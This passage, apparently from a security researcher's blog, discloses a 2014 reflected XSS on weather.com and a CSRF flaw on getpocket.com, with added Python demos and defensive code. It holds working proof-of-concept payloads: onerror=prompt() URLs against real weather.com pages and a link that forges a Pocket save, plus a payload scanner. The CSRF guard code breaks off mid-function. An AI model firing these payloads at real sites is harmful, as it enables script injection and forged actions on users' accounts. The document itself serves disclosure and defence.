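canonical-link template is a hypothetical stand-in for "uses URLs to
construct its HTML tags"; SAMPLE_SITE and fake_fetch are constructed.
"""
import html
from typing import Callable, Iterable, Tuple
from urllib.parse import quote

ORIGIN = "http://www.weather.com"

# Payload from the post's PoC: the quote ends the attribute value, the
# "/>" and ">" close the tag, and the <img> that follows fires its
# onerror handler as soon as the browser fails to load "x".
PAYLOAD = "\"--/>\"><img src=x onerror=prompt('justqdjing')>"


def render_vulnerable(path: str) -> str:
    """Hypothetical vulnerable template: the raw request path is dropped
    straight into an attribute value, so a quote in the path terminates
    the attribute and the rest of the path becomes live markup."""
    return f'<link rel="canonical" href="{ORIGIN}{path}">'


def render_hardened(path: str) -> str:
    """Hardened template with two context-specific layers: percent-encode
    the path so quotes and angle brackets cannot survive as URL characters,
    then HTML-escape the attribute value so nothing can end the attribute."""
    url = ORIGIN + quote(path, safe="/")
    return f'<link rel="canonical" href="{html.escape(url, quote=True)}">'


def reflects_raw(body: str, payload: str = PAYLOAD) -> bool:
    """Scanner check: did the payload come back byte-for-byte?  Any
    encoding on the way out (percent or HTML entity) breaks the match,
    which is exactly the property a fix has to have."""
    return payload in body


def scan(paths: Iterable[str], fetch: Callable[[str], str]) -> Tuple[int, int]:
    """Append the payload to every path, fetch, and count reflections.
    Returns (vulnerable, total)."""
    vulnerable = total = 0
    for path in paths:
        total += 1
        if reflects_raw(fetch(path + PAYLOAD)):
            vulnerable += 1
    return vulnerable, total


def vulnerable_rate(paths: Iterable[str], fetch: Callable[[str], str]) -> float:
    """Percentage of links that reflect the payload, as the post reports."""
    vulnerable, total = scan(list(paths), fetch)
    return 100.0 * vulnerable / total if total else 0.0


# Constructed offline stand-in for the site: three pages are served by the
# vulnerable template and one by the hardened template.
SAMPLE_SITE = {
    "/slideshows/main/": render_vulnerable,
    "/news/main/": render_vulnerable,
    "/home-garden/home/white-house-lawns-20140316": render_vulnerable,
    "/fixed/page/": render_hardened,
}


def fake_fetch(request_path: str) -> str:
    """Stand-in for an HTTP GET: route to whichever template serves the
    base path the request starts with."""
    for base, renderer in SAMPLE_SITE.items():
        if request_path.startswith(base):
            return renderer(request_path)
    return "<html><body>404 Not Found</body></html>"


if __name__ == "__main__":
    hit, total = scan(SAMPLE_SITE, fake_fetch)
    print(f"{hit}/{total} sample links reflect the payload ({100 * hit / total:.1f}%)")
    print("vulnerable:", render_vulnerable("/news/main/" + PAYLOAD))
    print("hardened:  ", render_hardened("/news/main/" + PAYLOAD))
```

<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Against a real site, fetch would be an HTTP GET and paths would come from a crawl; the reflection test itself does not change. Note that the hardened template does not "filter" the payload: it encodes the path for the URL context and then for the attribute context, so the payload is still present in the response but can no longer be parsed as markup.</span></span></div>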
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #222222; font-family: arial, sans-serif; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The vulnerability can be exploited without the victim being logged in. Tests were performed on Firefox 34.0 on Ubuntu 14.04 and IE 9.0.15 on Windows 8.</span></span></div>
</div>
</div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /><br /><span style="line-height: 19.6px; text-align: justify;"><br /></span></span></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmbUgNaqbf9cDviEklyRyi3r3hmgjxhtwvJh_TYA1hsRie0o4J9Twf2mjJnUWzT__PUBeNgfh3pCnUYdljLCj-jSLTtu3zFcdWcnXZr_4937NzH17JAZQ6sR1NTz4F8SJlj53sJHSLMnU/s1600/weather_1_xss.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmbUgNaqbf9cDviEklyRyi3r3hmgjxhtwvJh_TYA1hsRie0o4J9Twf2mjJnUWzT__PUBeNgfh3pCnUYdljLCj-jSLTtu3zFcdWcnXZr_4937NzH17JAZQ6sR1NTz4F8SJlj53sJHSLMnU/s1600/weather_1_xss.png" style="cursor: move;" width="400" /></a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /><br /></span></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLaFJzHXMwWhm9d0ecnFZk-Z5j9OubSRed36PRqp5qFkpRHg1fupC7sTZP8ZW9JNybZVDGAsN0mtkwv2qdk4isTmDVnt-DrrliN0-mcCdDYoBpvWJ6gNgQG_NcX5XwJkgxQ2guUnlF0-M/s1600/weather_2_xx.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLaFJzHXMwWhm9d0ecnFZk-Z5j9OubSRed36PRqp5qFkpRHg1fupC7sTZP8ZW9JNybZVDGAsN0mtkwv2qdk4isTmDVnt-DrrliN0-mcCdDYoBpvWJ6gNgQG_NcX5XwJkgxQ2guUnlF0-M/s1600/weather_2_xx.png" style="cursor: move;" width="400" /></a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes, e.g.</b></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.weather.com/slideshows/main/" target="_blank">http://www.weather.com/slideshows/main/</a>"--/&gt;"&gt;&lt;img src=x onerror=prompt('justqdjing')&gt;</span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.weather.com/home-garden/home/white-house-lawns-20140316%22--/" target="_blank">http://www.weather.com/home-garden/home/white-house-lawns-20140316"--/</a>&gt;"&gt;&lt;img src=x onerror=prompt('justqdjing')&gt;</span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.weather.com/news/main/" target="_blank">http://www.weather.com/news/main/</a>"&gt;&lt;img src=x onerror=prompt('justqdjing')&gt;</span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be">https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Details:</b></span></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://securityrelated.blogspot.sg/2014/11/the-weather-channel-weather.html">http://securityrelated.blogspot.com/2014/11/the-weather-channel-weather.html</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The Weather Channel patched this vulnerability in late November 2014 (the week before this was written).<br /><br /><span style="line-height: 19.6px; text-align: justify;">"The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" Many of the following classes of web security issue have been published there: buffer overflow, HTTP response splitting (CRLF), command injection, SQL injection, phishing, cross-site scripting, CSRF, cyber-attack, unvalidated redirects and forwards, information leakage, denial of service, file inclusion, weak encryption, privilege escalation, directory traversal, HTML injection, spam. This bug was published on Full Disclosure in November 2014.</span></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Discovered by:</span></span></div>
</div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Jing
Wang, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (<a href="https://twitter.com/justqdjing/status/558910579193040896">@justqdjing</a>)</span></span></div>
</div>
<div style="line-height: 19.6px; margin: 0px; outline: medium none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; transition: color 0.3s;" target="_blank">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></span></div>
</div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /><br /><br /><br /><br /><br /><b><br /></b><b>More Details:</b></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://seclists.org/fulldisclosure/2014/Nov/89">http://seclists.org/fulldisclosure/2014/Nov/89</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://lists.openwall.net/full-disclosure/2014/11/27/3">http://lists.openwall.net/full-disclosure/2014/11/27/3</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1253</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1">https://progressive-comp.com/?l=full-disclosure&m=141705578527909&w=1</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-fixes-web-app-flaws-the">http://whitehatview.tumblr.com/post/104313615841/the-weather-channel-flaw</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://www.inzeed.com/kaleidoscope/xss-vulnerability/the-weather-channel-exploit</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://diebiyi.com/articles/security/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://diebiyi.com/articles/security/the-weather-channel-bug</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8">http://whitehatpost.lofter.com/post/1cc773c8_6f2d4a8</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">https://vulnerabilitypost.wordpress.com/2014/12/04/the-weather-channel-flaw</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/234603051201411475314523/">http://tetraph.blog.163.com/blog/static/234603051201411475314523/</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blogspot.com/2014/12/the-weather-channel-weathercom-almost.html">http://tetraph.blogspot.com/2014/12/the-weather-channel-xss.html</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://ithut.tumblr.com/post/121916595448/weather-channel-xss">http://ithut.tumblr.com/post/121916595448/weather-channel-xss</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">https://mathfas.wordpress.com/2014/12/04/the-weather-channel-weather-bug</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/12/the-weather-channel-weathercom-almost.html">http://computerobsess.blogspot.com/2014/12/the-weather-channel-xss.html</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-weather-com-almost-all-links-vulnerable-to-xss-attacks/">http://www.tetraph.com/blog/xss-vulnerability/the-weather-channel-bug</a></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br /></span></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-36309736742818593332015-06-17T01:07:00.000-07:002015-06-17T01:08:26.528-07:00GetPocket getpocket.com CSRF (Cross-Site Request Forgery) Web Security Vulnerability<div style="margin-bottom: 1.3em;">
<div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF1Hv_DxLQJJRT3mPE9OZ60p0DBhA9SN7x8luS5pUgwqhWEH8wenZAtR8ogrXjQN9I6b1motjZcpjlRZP_-TuS3N9vxC4HmdO1qRTDZd3xt0R7ZFiscMYaOUWrujVbZP8TU_DeveOeWb4/s1600/pocket_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF1Hv_DxLQJJRT3mPE9OZ60p0DBhA9SN7x8luS5pUgwqhWEH8wenZAtR8ogrXjQN9I6b1motjZcpjlRZP_-TuS3N9vxC4HmdO1qRTDZd3xt0R7ZFiscMYaOUWrujVbZP8TU_DeveOeWb4/s400/pocket_1.png" style="cursor: move;" width="400" /></a></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 19.2px;"><b>GetPocket getpocket.com CSRF (Cross-Site Request Forgery) Web Security Vulnerability</b></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.2px;"><b>Domain: </b></span><span style="line-height: 19.2px;">getpocket.com</span></span></span></div>
<div style="direction: ltr; margin: 0px 0px 1.5em; padding: 0px; text-rendering: optimizelegibility;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.2px;">"Pocket was founded in 2007 by Nate Weiner to help people save interesting articles, videos and more from the web for later enjoyment. Once saved to Pocket, the list of content is visible on any device — phone, tablet or computer. It can be viewed while waiting in line, on the couch, during commutes or travel — even offline. </span><span style="line-height: 19.2px;">The world's leading save-for-later service currently has more than 17 million registered users and is integrated into more than 1500 apps including Flipboard, Twitter and Zite. It is available for major devices and platforms including iPad, iPhone, Android, Mac, Kindle Fire, Kobo, Google Chrome, Safari, Firefox, Opera and Windows." (From: https://getpocket.com/about)</span></span></span></div>
</div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 21px;"><span style="line-height: 28px;"><br /></span></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 21px;"><span style="line-height: 28px;"><br /></span></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 21px;"><span style="line-height: 28px;"><b>Vulnerability Description:</b></span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><span style="line-height: 19.6px; text-align: justify;">Pocket</span></span><span style="font-size: small;"><span style="line-height: 19.6px;"> has a web security vulnerability that an attacker can exploit through CSRF attacks.</span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.6px;"><br /></span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 19.6px;">"Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application." (OWASP)</span></span></span></div>
<div style="line-height: 28px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="line-height: 28px; text-align: justify;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; text-align: justify;">Tests were performed on Microsoft IE 9 (9.0.8112.16421) on Windows 7, Mozilla Firefox (37.0.2) and Google Chromium 42.0.2311 (64-bit) on Ubuntu 14.04.2, and Apple Safari 6.1.6 on Mac OS X v10.9 Mavericks.</span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; text-align: justify;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; text-align: justify;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: white; font-size: small; text-align: justify;"><br /></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Vulnerability Details:</b></span></span></div>
<div style="line-height: 28px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 21px;">The programming flaw exists in the "https://getpocket.com/edit/edit" page, i.e. </span><span style="line-height: 25.2px;">https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=</span></span></span></div>
</div>
<div style="margin-bottom: 1.3em;">
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;">Vulnerable URL:</span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;">https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=</span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="background-color: white; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="line-height: 28px;">A website created by me is used for the following tests: "</span><span style="background-color: transparent; line-height: 28px;"><a href="http://itinfotech.tumblr.com/">http://itinfotech.tumblr.com/</a></span><span style="line-height: 28px;">". Suppose that this website is malicious. If it contains the following link, attackers can save any item they like to a victim's Pocket.</span></span></span></div>
<div style="background-color: white; line-height: 21px; margin: 0px; padding: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><a href="https://getpocket.com/edit?url=http%3A%2F%2Fmake.wordpress.org%2Fcore%2F2014%2F01%2F15%2Fgit-mirrors-for-wordpress&title=csrf test">getpocket csrf test</a> [1]</span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 21px; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small; line-height: 28px;">When a logged-in victim clicks the link ([1]), a new item is saved to his or her Pocket without any notice, and the attack has succeeded.</span></span></div>
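<div style="margin: 0px;">The guard below is an added example written for this post, not Pocket's own code: it shows the server-side checks (state changes over POST only, an Origin/Referer allow-list, and a per-session token compared in constant time) whose absence lets a bare link like [1] save an item to a logged-in victim's list, and runs them against the link from the post, a forged cross-origin form, a same-origin request with a wrong token, and a genuine first-party save. The url/title parameters and the lure site follow the text above; the Request and Session shapes, the allowed origin and the token handling are assumptions of the example.</div>

```python
"""Added example (not Pocket's code): server-side CSRF guard for a "save item"
endpoint, showing the checks whose absence lets a bare link like [1] add an item
to a logged-in victim's list.  Request/Session shapes and origins are assumed."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Only first-party pages may trigger a save (assumed value for this example).
ALLOWED_ORIGINS = {"https://getpocket.com"}


@dataclass
class Session:
    """Server-side session; the per-session anti-CSRF token is embedded in
    first-party forms (synchronizer token pattern)."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as the application sees it."""
    method: str
    headers: Dict[str, str]
    form: Dict[str, str] = field(default_factory=dict)   # query or body params
    session: Optional[Session] = None  # None when no valid session cookie arrived


def origin_of(request: Request) -> Optional[str]:
    """scheme://host[:port] of the page that issued the request, or None.
    Browsers send Origin on cross-site POSTs; Referer is the fallback."""
    for header in ("Origin", "Referer"):
        value = request.headers.get(header)
        if value:
            parts = urlsplit(value)
            if parts.scheme and parts.netloc:
                return f"{parts.scheme}://{parts.netloc}"
    return None


def check_csrf(request: Request) -> Tuple[bool, str]:
    """Decide whether a state-changing request may proceed: (ok, reason)."""
    if request.session is None:
        return False, "not authenticated"
    # The flaw in the post: a save done by GET fires from any link or <img>.
    # State changes must use POST (or another non-safe verb).
    if request.method.upper() != "POST":
        return False, "state change must use POST, not GET"
    origin = origin_of(request)
    if origin not in ALLOWED_ORIGINS:   # None (no header at all) is rejected too
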